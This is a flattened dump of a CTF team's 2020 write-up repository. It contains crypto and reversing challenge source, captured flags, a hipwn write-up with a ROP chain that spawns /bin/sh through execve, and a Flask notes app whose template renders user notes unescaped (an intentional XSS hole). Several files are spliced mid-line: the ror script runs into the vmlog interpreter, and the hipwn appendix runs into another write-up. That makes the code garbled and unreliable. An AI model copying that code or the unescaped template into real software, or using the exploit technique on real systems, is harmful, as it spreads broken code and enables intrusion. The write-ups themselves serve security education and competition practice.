FUCK_U_BEATCH_SUCK_KIRPITCH` but we were unable to locate the keepass db. 15 | It was not in the memdump. 16 | It turns out you had to guess that there is a pastebin link there... 17 | -------------------------------------------------------------------------------- /2020-03-01-AeroCTF/elderly/file.enc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-03-01-AeroCTF/elderly/file.enc -------------------------------------------------------------------------------- /2020-03-01-AeroCTF/elderly/main.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-03-01-AeroCTF/elderly/main.pyc -------------------------------------------------------------------------------- /2020-03-01-AeroCTF/magic/output.txt: -------------------------------------------------------------------------------- 1 | d9a103a6006bfba17074ef571011d8eededdf851b355bdc4795616744066433695b9e9201f6deff7577c03ba690d4d517bdaae 2 | 5405053190768240950975482839552589374748349681382030872360550121041249100085609471 3 | -------------------------------------------------------------------------------- /2020-03-01-AeroCTF/magic/task.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3.7 2 | 3 | import numpy as np 4 | 5 | from itertools import chain 6 | 7 | 8 | class Cipher(object): 9 | def __init__(self, key: int, canary: int): 10 | self._key = key 11 | self._canary = canary 12 | return 13 | 14 | @property 15 | def canary(self) -> int: 16 | return self._canary 17 | 18 | def encrypt(self, message: bytes) -> bytes: 19 | plaintext = int.from_bytes(message, 'big') 20 | assert self._key.bit_length() >= plaintext.bit_length() 21 | ciphertext = self._key ^ plaintext 22 | length = (ciphertext.bit_length() + 7) // 8 23 | return ciphertext.to_bytes(length, 'big') 24 | 25 | def decrypt(self, message: bytes) -> bytes: 26 | raise NotImplementedError 27 | 28 | @classmethod 29 | def create(cls, source: np.ndarray) -> 'Cipher': 30 | assert len(set(source.shape)) == 1 31 | line = source.reshape(-1) 32 | assert len(line) == len(set(line) & set(range(len(line)))) 33 | keys = set(map(sum, chain.from_iterable((*s, np.diag(s)) for s in [source, source.T]))) 34 | assert len(keys) == 1 35 | key = int(keys.pop()) 36 | return cls(key, key % len(line)) 37 | 38 | 39 | def main(): 40 | from secret import SECRET, FLAG 41 | cipher = Cipher.create(SECRET) 42 | print(cipher.encrypt(FLAG).hex()) 43 | print(cipher.canary) 44 | return 45 | 46 | 47 | if __name__ == '__main__': 48 | main() 49 | -------------------------------------------------------------------------------- /2020-03-01-AeroCTF/mental_beginning/Cheme.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-03-01-AeroCTF/mental_beginning/Cheme.png -------------------------------------------------------------------------------- /2020-03-07-zer0ptsCTF/README.md: -------------------------------------------------------------------------------- 1 | # zer0pts CTF 2020 2 | 3 | Team: XeR, SIben, BitK, shalom 4 | 5 | ### Table of contents 6 | 7 | * [Locked kitkat (forensics)](locked) 8 | * [Dirty Laundry (crypto)](dirty-laundry) 9 | * [Nibelung (crypto)](nibelung) 10 | * [ROR (crypto)](ror) 11 | * [vmlog (re)](vmlog) 12 | * [QR Puzzle (re)](qr) 13 | * [easy strcmp (re)](strcmp) 14 | * [wysinwyg (re)](wysinwyg) 15 | * [Hobbit (re)](hobbit) 16 | * [hipwn (pwn)](hipwn) 17 | * [diylist (pwn)](diylist) 18 | * [protrude (pwn)](protrude) 19 | * [babybof (pwn)](babybof) 20 | * [syscall kit (pwn)](syscall) 21 | * [meowmow (pwn)](meowmow) 22 | -------------------------------------------------------------------------------- /2020-03-07-zer0ptsCTF/dirty-laundry/chall.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/sage 2 | from sage.all import * 3 | from Crypto.Util.number import getStrongPrime, bytes_to_long 4 | 5 | from secret import flag 6 | 7 | class PRNG256(object): 8 | def __init__(self, seed): 9 | self.mask = (1 << 256) - 1 10 | self.seed = seed & self.mask 11 | 12 | def _pick(self): 13 | b = ((self.seed>>0)^(self.seed>>2)^(self.seed>>5)^(self.seed>>10)^1)&1 14 | self.seed = ((self.seed>>1)|(b<<255)) & self.mask 15 | return b 16 | 17 | def rand(self): 18 | x = 0 19 | for i in range(256): 20 | x = (x << 1) | self._pick() 21 | return x 22 | 23 | PRIME = getStrongPrime(1024) 24 | prng = PRNG256(PRIME) 25 | 26 | def paillier_enc(m, p, noise): 27 | p = next_prime(p + noise) 28 | q = getStrongPrime(512) 29 | n = p * q 30 | g = (1 + prng.rand() * n) % n**2 31 | c = pow(g, m, n**2) * pow(prng.rand(), n, n**2) % n**2 32 | return n, g, c 33 | 34 | def make_shares(secret, k, shares, prime=PRIME): 35 | PR, x = PolynomialRing(GF(prime), name='x').objgen() 36 | f = PR([secret] + [ZZ.random_element(prime) for _ in range(k-1)]) 37 | xy = [] 38 | pubkey = [] 39 | for x in range(1, shares+1): 40 | noise = prng.rand() 41 | n, g, y = paillier_enc(f(x) + noise, prime, noise) 42 | pubkey.append([n, g]) 43 | xy.append([x, y]) 44 | return pubkey, xy 45 | 46 | secret = bytes_to_long(flag) 47 | pubkey, shares = make_shares(secret, 3, 5) 48 | 49 | print("[+] len(flag):", len(flag)) 50 | print("[+] pubkey:", pubkey) 51 | print("[+] shares:", shares) 52 | -------------------------------------------------------------------------------- /2020-03-07-zer0ptsCTF/hipwn/README.md: -------------------------------------------------------------------------------- 1 | # hipwn - zer0pts CTF 2020 (pwn, 158p, 81 solved) 2 | ## Introduction 3 | 4 | hipwn is a pwn task. 5 | 6 | An archive containing a binary, and its source code is provided. 7 | 8 | The binary asks the user for its name, and prints it. 9 | 10 | ## Exploitation 11 | 12 | The binary uses `gets` to read the user input in a fixed-size array on the 13 | stack. There is no protection on the stack. 14 | 15 | This is the most basic case of a stack-based buffer overflow. 16 | 17 | The binary is statically compiled, so the whole libc is contianed in the bianry. 18 | It is not compiled as a position-independant executable. As a result, it is not 19 | subject to ASLR. 20 | 21 | The ROP chain used to exploit this binary is the following: 22 | ```assembler 23 | pop rax; "/bin/sh\0" 24 | pop rdi; 0x00604268 // somewhere on the bss 25 | mov [rdi], rax 26 | pop rsi; NULL 27 | pop rdx, NULL 28 | pop rax, SYS_execve 29 | syscall 30 | ``` 31 | 32 | **Flag**: `zer0pts{welcome_yokoso_osooseyo_huanying_dobropozhalovat}` 33 | 34 | ## Appendices 35 | 36 | ### pwn.php 37 | 38 | ```php 39 | #!/usr/bin/php 40 | 321564 12 | 13 | [+] Gesture: 14 | 15 | ----- ----- ----- 16 | | | | 3 | | 2 | 17 | ----- ----- ----- 18 | ----- ----- ----- 19 | | 1 | | 6 | | 4 | 20 | ----- ----- ----- 21 | ----- ----- ----- 22 | | 5 | | | | | 23 | ----- ----- ----- 24 | ``` 25 | 26 | Once we input this we get: `zer0pts{n0th1ng_1s_m0r3_pr4ct1c4l_th4n_brut3_f0rc1ng}` 27 | -------------------------------------------------------------------------------- /2020-03-07-zer0ptsCTF/locked/gesture.key: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-03-07-zer0ptsCTF/locked/gesture.key -------------------------------------------------------------------------------- /2020-03-07-zer0ptsCTF/nibelung/server.py: -------------------------------------------------------------------------------- 1 | from fglg import FiniteGeneralLinearGroup 2 | from secret import flag 3 | import base64 4 | import math 5 | 6 | def menu(): 7 | print("====================") 8 | print("[1] Encrypt", flush=True) 9 | print("[2] Decrypt", flush=True) 10 | print("====================") 11 | try: 12 | print("> ", end="", flush=True) 13 | return int(input()) 14 | except: 15 | return 0 16 | 17 | def bytes2gl(b, n, p=None): 18 | assert len(b) <= n * n 19 | X = FiniteGeneralLinearGroup(n, p) 20 | padlen = n * n - len(b) 21 | b = bytes([padlen]) * padlen + b 22 | for i in range(n): 23 | for j in range(n): 24 | X.set_at((j, i), b[i*n + j]) 25 | return X 26 | 27 | def recv_message(n, p): 28 | print("Data: ", end="", flush=True) 29 | b = base64.b64decode(input()) 30 | return bytes2gl(b, n, p) 31 | 32 | def encrypt(U, X): 33 | return U * X * U**-1 34 | 35 | def decrypt(U, X): 36 | return U**-1 * X * U 37 | 38 | if __name__ == '__main__': 39 | # Create flag F 40 | n = math.ceil(math.sqrt(len(flag))) 41 | F = bytes2gl(flag, n) 42 | p = F.p 43 | 44 | # Generate private key 45 | U = FiniteGeneralLinearGroup(n, p) 46 | while U.determinant() == 0: 47 | U.set_random() 48 | 49 | eF = encrypt(U, F) 50 | assert decrypt(U, eF) == F 51 | print("Encrypted Flag:", flush=True) 52 | print(eF, flush=True) 53 | print("p = {}".format(F.p), flush=True) 54 | 55 | while True: 56 | choice = menu() 57 | if choice == 1: 58 | # Encrypt 59 | M = recv_message(U.n, U.p) 60 | C = encrypt(U, M) 61 | print("Encrypted:", flush=True) 62 | print(C, flush=True) 63 | elif choice == 2: 64 | # Decrypt 65 | C = recv_message(U.n, U.p) 66 | M = decrypt(U, C) 67 | print("Decrypted:", flush=True) 68 | print(M, flush=True) 69 | else: 70 | break 71 | 72 | print("Bye!", flush=True) 73 | -------------------------------------------------------------------------------- /2020-03-07-zer0ptsCTF/qr/chall: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-03-07-zer0ptsCTF/qr/chall -------------------------------------------------------------------------------- /2020-03-07-zer0ptsCTF/qr/decoded.txt: -------------------------------------------------------------------------------- 1 | 1111111001000101001111111 2 | 1000001011001001001000001 3 | 1011101001110011101011101 4 | 1011101001100010101011101 5 | 1011101011000111001011101 6 | 1000001001110111101000001 7 | 1111111010101010101111111 8 | 0000000000101101100000000 9 | 1010101000001110000010010 10 | 0011100010000110101001001 11 | 1001001100011110111010011 12 | 1110110110001111000101000 13 | 0101001011011100011101011 14 | 0101100101111010101001011 15 | 1001011011011000000100111 16 | 0101010010001110011110011 17 | 1001101001110010111111000 18 | 0000000011110000100011001 19 | 1111111001100101101010111 20 | 1000001001010001100010000 21 | 1011101011101000111111011 22 | 1011101000111101000010000 23 | 1011101010111011010110101 24 | 1000001001001111111010010 25 | 1111111011110011100011011 26 | -------------------------------------------------------------------------------- /2020-03-07-zer0ptsCTF/qr/encrypted.qr: -------------------------------------------------------------------------------- 1 | 1111111100000100110011111 2 | 1010000011100011100101010 3 | 1010010111010110011010100 4 | 0011101001100100010111111 5 | 1011101001111011110101111 6 | 0010101111010111001010000 7 | 1101001010010011110000111 8 | 1001000100011101000011000 9 | 0000010010100110010011000 10 | 1111100000001010001100011 11 | 0011000111001101010010010 12 | 1011101010111011001101111 13 | 1100110001111100010100110 14 | 0100111111011000110100001 15 | 0010100100001111000011101 16 | 0001001010110000011111011 17 | 1101110001111000101111000 18 | 1100000011100011100011011 19 | 0101110001101101110110001 20 | 1100011011001000011010110 21 | 1011001001110001011110001 22 | 1101011010110100100010100 23 | 0011101000011111010011010 24 | 1110011000100111111001110 25 | 1110110111111011110001001 26 | -------------------------------------------------------------------------------- /2020-03-07-zer0ptsCTF/qr/out.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-03-07-zer0ptsCTF/qr/out.png -------------------------------------------------------------------------------- /2020-03-07-zer0ptsCTF/ror/chall.py: -------------------------------------------------------------------------------- 1 | import random 2 | from secret import flag 3 | 4 | ror = lambda x, l, b: (x >> l) | ((x & ((1<": 28 | p = (p + 1) % 10 29 | elif op == "<": 30 | p = (p - 1) % 10 31 | elif op == ",": 32 | a = sys.stdin.buffer.read(1) 33 | if not a: 34 | reg = 0 35 | else: 36 | reg += ord(a) 37 | elif op == "p": 38 | buf += str(reg) 39 | elif op == "[": 40 | if reg == 0: 41 | cnt = 1 42 | while cnt != 0: 43 | pc += 1 44 | if program[pc] == "[": 45 | cnt += 1 46 | if program[pc] == "]": 47 | cnt -= 1 48 | elif op == "]": 49 | if reg != 0: 50 | cnt = 1 51 | while cnt != 0: 52 | pc -= 1 53 | if program[pc] == "[": 54 | cnt -= 1 55 | if program[pc] == "]": 56 | cnt += 1 57 | elif op == "M": 58 | print(mem) 59 | 60 | pc += 1 61 | 62 | print(buf) 63 | -------------------------------------------------------------------------------- /2020-03-07-zer0ptsCTF/wysinwyg/wysinwyg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-03-07-zer0ptsCTF/wysinwyg/wysinwyg -------------------------------------------------------------------------------- /2020-03-29-VolgaCTF/README.md: -------------------------------------------------------------------------------- 1 | # Volga CTF 2020 2 | 3 | Team: XeR, SIben, BitK, SakiiR, shalom 4 | 5 | ### Table of contents 6 | 7 | * [DotNetMe (reverse)](dotnetme) 8 | -------------------------------------------------------------------------------- /2020-03-29-VolgaCTF/dotnetme/check_flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-03-29-VolgaCTF/dotnetme/check_flag.png -------------------------------------------------------------------------------- /2020-03-29-VolgaCTF/dotnetme/cleaned_with_de4dot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-03-29-VolgaCTF/dotnetme/cleaned_with_de4dot.png -------------------------------------------------------------------------------- /2020-03-29-VolgaCTF/dotnetme/cli.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-03-29-VolgaCTF/dotnetme/cli.png -------------------------------------------------------------------------------- /2020-03-29-VolgaCTF/dotnetme/computeHash.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-03-29-VolgaCTF/dotnetme/computeHash.png -------------------------------------------------------------------------------- /2020-03-29-VolgaCTF/dotnetme/congratulation.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-03-29-VolgaCTF/dotnetme/congratulation.png -------------------------------------------------------------------------------- /2020-03-29-VolgaCTF/dotnetme/de4dot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-03-29-VolgaCTF/dotnetme/de4dot.png -------------------------------------------------------------------------------- /2020-03-29-VolgaCTF/dotnetme/debugger_internal_error.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-03-29-VolgaCTF/dotnetme/debugger_internal_error.png -------------------------------------------------------------------------------- /2020-03-29-VolgaCTF/dotnetme/extracted_key.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-03-29-VolgaCTF/dotnetme/extracted_key.png -------------------------------------------------------------------------------- /2020-03-29-VolgaCTF/dotnetme/hash_check.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-03-29-VolgaCTF/dotnetme/hash_check.PNG -------------------------------------------------------------------------------- /2020-03-29-VolgaCTF/dotnetme/magic.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-03-29-VolgaCTF/dotnetme/magic.gif -------------------------------------------------------------------------------- /2020-03-29-VolgaCTF/dotnetme/no_invalid_format.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-03-29-VolgaCTF/dotnetme/no_invalid_format.png -------------------------------------------------------------------------------- /2020-03-29-VolgaCTF/dotnetme/obfuscated.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-03-29-VolgaCTF/dotnetme/obfuscated.png -------------------------------------------------------------------------------- /2020-03-29-VolgaCTF/dotnetme/obfuscated2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-03-29-VolgaCTF/dotnetme/obfuscated2.png -------------------------------------------------------------------------------- /2020-03-29-VolgaCTF/dotnetme/task.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-03-29-VolgaCTF/dotnetme/task.png -------------------------------------------------------------------------------- /2020-03-29-VolgaCTF/dotnetme/unknown_string.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-03-29-VolgaCTF/dotnetme/unknown_string.png -------------------------------------------------------------------------------- /2020-03-29-VolgaCTF/dotnetme/vs.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-03-29-VolgaCTF/dotnetme/vs.png -------------------------------------------------------------------------------- /2020-04-04-MidnightSun-quals/README.md: -------------------------------------------------------------------------------- 1 | # MidnightSun CTF 2020 Quals 2 | 3 | Team: XeR, SIben, BitK, SakiiR, shalom 4 | 5 | ### Table of contents 6 | 7 | 8 | * [Masterpiece (forensics)](masterpiece) 9 | * [Verifier2 (crypto)](verifier2) 10 | -------------------------------------------------------------------------------- /2020-04-04-MidnightSun-quals/masterpiece/Mario Paint (Japan, USA).000: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-04-04-MidnightSun-quals/masterpiece/Mario Paint (Japan, USA).000 -------------------------------------------------------------------------------- /2020-04-04-MidnightSun-quals/masterpiece/README.md: -------------------------------------------------------------------------------- 1 | # Masterpiece (forensics, 78p, 115 solved) 2 | 3 | In the challenge we get a Snes9x [state save file](masterpiece.000). 4 | This is basically a saved state of the emulator. 5 | If we ungzip this file and look at it with hexeditor we can extract some information about the game: 6 | 7 | ``` 8 | NAM:000065:Z:\Share\snes-forensics\snes9x\Roms\Mario Paint (Japan, USA).sfc 9 | ``` 10 | 11 | So we know the game, and we can easily find this ROM on the internet. 12 | However just trying to load this file via `load game position` crashes/hangs the emulator. 13 | 14 | If you look at the specs for the save state file eg. at https://github.com/snes9xgit/snes9x/blob/master/docs/snapshots.txt 15 | you will see that the file has some clear structure with sections we can easily find by looking for certain strings. 16 | 17 | Our first idea was to create a clean save state file for this game, and then transplant the memory and registers values from the broken save file, using hexeditor. 18 | 19 | With this we got [this save file](Mario Paint (Japan, USA).000) which when loaded shows: 20 | 21 | ![](flag.png) 22 | 23 | And the flag is: `midnight{ITS_A_ME_FLAG_IN_THE_A_GAME}` 24 | -------------------------------------------------------------------------------- /2020-04-04-MidnightSun-quals/masterpiece/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-04-04-MidnightSun-quals/masterpiece/flag.png -------------------------------------------------------------------------------- /2020-04-04-MidnightSun-quals/masterpiece/masterpiece.000: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-04-04-MidnightSun-quals/masterpiece/masterpiece.000 -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/README.md: -------------------------------------------------------------------------------- 1 | # ByteBandits CTF 2020 2 | 3 | Team: XeR, SakiiR, shalom 4 | 5 | ### Table of contents 6 | 7 | * [Autobot (re)](autobot) 8 | * [Baby rust (re)](baby_rust) 9 | * [Oldschool (crypto)](oldschool) 10 | * [Secure DES (crypto)](secure_des) 11 | * [RSyay! (crypto)](rsyay) 12 | * [Meet me there (crypto)](meet) 13 | * [Extra careful bank (crypto)](ecb) 14 | * [AESy (crypto)](aesy) 15 | * [string.equals(integer) (misc)](string_equals) 16 | * [wooter (re)](wooter) 17 | * [Notes App (web)](notes-app) 18 | -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/baby_rust/babyrust: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-04-12-ByteBanditsCTF/baby_rust/babyrust -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/meet/meet.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import random 4 | from Crypto.Cipher import AES 5 | from os import urandom 6 | from string import printable 7 | 8 | random.seed(urandom(32)) 9 | 10 | key1 = '0'*13 + ''.join([random.choice(printable) for _ in range(3)]) 11 | key2 = ''.join([random.choice(printable) for _ in range(3)]) + '0'*13 12 | 13 | cipher1 = AES.new(key=key1, mode=AES.MODE_ECB) 14 | cipher2 = AES.new(key=key2, mode=AES.MODE_ECB) 15 | 16 | print "\nGive me a string:" 17 | pt = raw_input() 18 | 19 | val = len(pt) % 16 20 | if not val == 0: 21 | pt += '0'*(16 - val) 22 | 23 | c1 = cipher1.encrypt(pt.encode('hex')) 24 | c2 = cipher2.encrypt(c1.encode('hex')) 25 | print 'Encrypted string:\n' + c2.encode('hex') 26 | 27 | with open("flag.txt") as f: 28 | flag = f.read().strip() 29 | # length of flag is a multiple of 16 30 | ct1 = cipher1.encrypt(flag.encode('hex')) 31 | ct2 = cipher2.encrypt(ct1.encode('hex')) 32 | print '\nEncrypted Flag:\n' + ct2.encode('hex') + '\n' 33 | 34 | -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/notes-app/images/main.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-04-12-ByteBanditsCTF/notes-app/images/main.png -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/notes-app/sources/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:alpine 2 | 3 | RUN apk add --no-cache postgresql-libs && \ 4 | apk add --no-cache --virtual .build-deps gcc musl-dev postgresql-dev chromium udev ttf-freefont 5 | 6 | COPY . /app 7 | 8 | WORKDIR /app 9 | 10 | RUN pip install -r requirements.txt 11 | 12 | RUN pip install pyppeteer 13 | 14 | # Create a group and user 15 | RUN addgroup -S appgroup && adduser -S appuser -G appgroup 16 | 17 | # Tell docker that all future commands should run as the appuser user 18 | USER appuser 19 | -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/notes-app/sources/config.py: -------------------------------------------------------------------------------- 1 | import os 2 | 3 | 4 | class Config: 5 | """Set Flask configuration vars from .env file.""" 6 | 7 | # General Config 8 | SECRET_KEY = os.environ.get('SECRET_KEY', "supersecret") 9 | FLASK_APP = os.environ.get('FLASK_APP') 10 | FLASK_ENV = os.environ.get('FLASK_ENV') 11 | FLASK_DEBUG = os.environ.get('FLASK_DEBUG') 12 | 13 | DEBUG = os.environ.get('DEBUG', True) 14 | 15 | # Database 16 | SQLALCHEMY_DATABASE_URI = os.environ.get('SQLALCHEMY_DATABASE_URI', "sqlite:///test.db") 17 | SQLALCHEMY_TRACK_MODIFICATIONS = os.environ.get('SQLALCHEMY_TRACK_MODIFICATIONS') 18 | -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/notes-app/sources/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3" 2 | services: 3 | web: 4 | build: . 5 | command: gunicorn server:app -b '0.0.0.0:8000' 6 | ports: 7 | - "7002:8000" 8 | volumes: 9 | - .:/app 10 | environment: 11 | - ADMIN_PASS 12 | - FLAG 13 | - SQLALCHEMY_DATABASE_URI=sqlite:////tmp/test.db 14 | depends_on: 15 | - redis 16 | worker: 17 | build: . 18 | command: rq worker -u 'redis://redis' 19 | depends_on: 20 | - redis 21 | environment: 22 | - ADMIN_PASS 23 | volumes: 24 | - .:/app 25 | redis: 26 | image: redis:alpine 27 | -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/notes-app/sources/mynotes/__init__.py: -------------------------------------------------------------------------------- 1 | """Initialize app.""" 2 | from flask import Flask 3 | from flask_sqlalchemy import SQLAlchemy 4 | from flask_login import LoginManager 5 | 6 | db = SQLAlchemy() 7 | login_manager = LoginManager() 8 | 9 | 10 | def create_app(): 11 | """Construct the core app object.""" 12 | app = Flask(__name__, instance_relative_config=False) 13 | 14 | # Application Configuration 15 | app.config.from_object('config.Config') 16 | 17 | # Initialize Plugins 18 | db.init_app(app) 19 | login_manager.init_app(app) 20 | 21 | with app.app_context(): 22 | 23 | # Create Database Models 24 | db.create_all() 25 | 26 | return app 27 | -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/notes-app/sources/mynotes/models.py: -------------------------------------------------------------------------------- 1 | from . import db 2 | from flask_login import UserMixin 3 | from werkzeug.security import generate_password_hash, check_password_hash 4 | 5 | 6 | class User(UserMixin, db.Model): 7 | """Model for user accounts.""" 8 | 9 | __tablename__ = 'flasklogin-users' 10 | 11 | id = db.Column(db.String(50), 12 | primary_key=True) 13 | password = db.Column(db.String(200), 14 | primary_key=False, 15 | unique=False, 16 | nullable=False) 17 | notes = db.Column(db.String(200), 18 | primary_key=False, 19 | unique=False, 20 | nullable=False) 21 | 22 | def set_password(self, password): 23 | """Create hashed password.""" 24 | self.password = generate_password_hash(password, method='sha256') 25 | 26 | def check_password(self, password): 27 | """Check hashed password.""" 28 | return check_password_hash(self.password, password) 29 | 30 | def __repr__(self): 31 | return ''.format(self.id) 32 | -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/notes-app/sources/mynotes/templates/index.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block body %} 3 | 4 |
5 |
6 | 30 |
31 |
32 |
33 |

34 | My Notes 35 |

36 |

37 | A secure place to jot down your thoughts 38 |

Start writing now

39 | 40 |
41 |
42 |
43 | 44 | {% endblock %} 45 | -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/notes-app/sources/mynotes/templates/layout.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | NotesApp 8 | 14 | 15 | 16 | {% block body %} {% endblock %} 17 | 18 |
19 |
20 |

MyNotes by n0ob.

21 |
22 |
23 | 24 | -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/notes-app/sources/mynotes/templates/login.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block body %} 3 |
4 |
5 |
6 | {% with messages = get_flashed_messages() %} 7 | {% if messages %} 8 | {% for message in messages %} 9 |
10 | {{message}} 11 |
12 | {% endfor %} 13 | {% endif %} 14 | {% endwith %} 15 |

Sign In

16 | 17 |
18 |
19 |
20 |
21 | 22 |
23 |
24 | 25 |
26 |
27 | 28 |
29 |
30 | 31 |
32 |
33 |

34 | Sign Up 35 |

36 |
37 |
38 |
39 | {% endblock %} 40 | -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/notes-app/sources/mynotes/templates/profile.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block body %} 3 |
4 |
5 | 23 |
24 |
25 |
26 |
27 | Howdy {{current_user.id}}! 28 |
29 | 30 |

{{current_user.notes | safe}}

31 |
32 |
33 | 34 | 35 |
36 |
37 |
38 |
39 | {% endblock %} 40 | -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/notes-app/sources/mynotes/templates/register.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block body %} 3 |
4 |
5 |
6 | {% with messages = get_flashed_messages() %} 7 | {% if messages %} 8 | {% for message in messages %} 9 |
10 | {{message}} 11 |
12 | {% endfor %} 13 | {% endif %} 14 | {% endwith %} 15 |

Sign Up

16 | 17 |
18 |
19 |
20 |
21 | 22 |
23 |
24 | 25 |
26 |
27 | 28 |
29 |
30 | 31 |
32 |
33 |

34 | Sign In 35 |

36 |
37 |
38 |
39 | {% endblock %} 40 | -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/notes-app/sources/mynotes/templates/status.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block body %} 3 |
4 |
5 |
6 |

URL Status

7 |
8 | 9 | Job status: 10 | 11 | 12 | {{status}} 13 | 14 |
15 |
16 |
17 |
18 | {% endblock %} 19 | -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/notes-app/sources/mynotes/templates/visit_link.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block body %} 3 |
4 |
5 |
6 | {% with messages = get_flashed_messages() %} 7 | {% if messages %} 8 | {% for message in messages %} 9 |
10 | {{message}} 11 |
12 | {% endfor %} 13 | {% endif %} 14 | {% endwith %} 15 | {% if job_id %} 16 |
Visit here for status.
17 | {% endif %} 18 |

Send Link

19 | 20 |
21 |
22 |
23 |
24 | 25 |
26 |
27 |

28 | 29 | 30 |
31 |
32 |
33 |
34 |
